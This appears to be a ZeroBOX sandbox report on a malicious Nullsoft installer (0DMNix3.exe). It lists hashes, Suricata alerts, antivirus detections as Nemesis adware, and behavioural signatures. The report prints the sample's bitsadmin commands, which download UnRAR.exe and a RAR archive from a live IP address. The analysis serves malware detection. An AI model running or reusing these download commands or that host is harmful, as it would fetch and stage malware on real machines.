Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 4, 2024, 4:12 p.m.	Dec. 4, 2024, 4:16 p.m.

Size	42.2KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`dd587632bd83be28e06fc74be5ffe634`
SHA256	`21236dee121b0f9fe9cf21093f857d092bb9c56b57b59c52d65ec204408c15a7`
CRC32	`4D0D8AC7`
ssdeep	`768:h+f6qfEqLBTxrLkSRoys2uGUmRDcMznWHWmZCXrs0D3S9i1Gcu8bj1om:efHLrLkSRoybCQUZsrs0DC1cu8bj1om`
Yara	Malicious_Library_Zero - Malicious_Library NSIS_Installer - Null Soft Installer IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

0DMNix3.exe "C:\Users\test22\AppData\Local\Temp\0DMNix3.exe"
1932
- PING.EXE ping -n 1 8.8.8.8
  2060
- bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe"
  2164
- bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\test22\AppData\Local\Temp\jstsolwx.rar"
  2664

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
194.15.46.189	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 4, 2024, 4:12 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://194.15.46.189/UnRAR.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://194.15.46.189/UnRAR.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://194.15.46.189/jstsolwx.rar
suspicious_features	Connection to IP address	suspicious_request	GET http://194.15.46.189/jstsolwx.rar

Performs some HTTP requests (4 events)

request	HEAD http://194.15.46.189/UnRAR.exe
request	GET http://194.15.46.189/UnRAR.exe
request	HEAD http://194.15.46.189/jstsolwx.rar
request	GET http://194.15.46.189/jstsolwx.rar

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\nssBF73.tmp\nsExec.dll

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\nssBF73.tmp\nsExec.dll

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

ping -n 1 8.8.8.8

Communicates with host for which no DNS query was performed (1 event)

host

194.15.46.189

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Bkav	W32.AIDetectMalware
CTX	exe.adware.nemesis
ALYac	Gen:Variant.Adware.Nemesis.590
Cylance	Unsafe
VIPRE	Gen:Variant.Adware.Nemesis.590
CrowdStrike	win/malicious_confidence_60% (D)
Arcabit	Trojan.Adware.Nemesis.590
APEX	Malicious
BitDefender	Gen:Variant.Adware.Nemesis.590
MicroWorld-eScan	Gen:Variant.Adware.Nemesis.590
Emsisoft	Gen:Variant.Adware.Nemesis.590 (B)
Trapmine	malicious.moderate.ml.score
SentinelOne	Static AI - Suspicious PE
FireEye	Gen:Variant.Adware.Nemesis.590
Kingsoft	malware.kb.a.742
GData	Gen:Variant.Adware.Nemesis.590

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe"
cmdline	bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\test22\AppData\Local\Temp\jstsolwx.rar"

Generates some ICMP traffic

0DMNix3.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All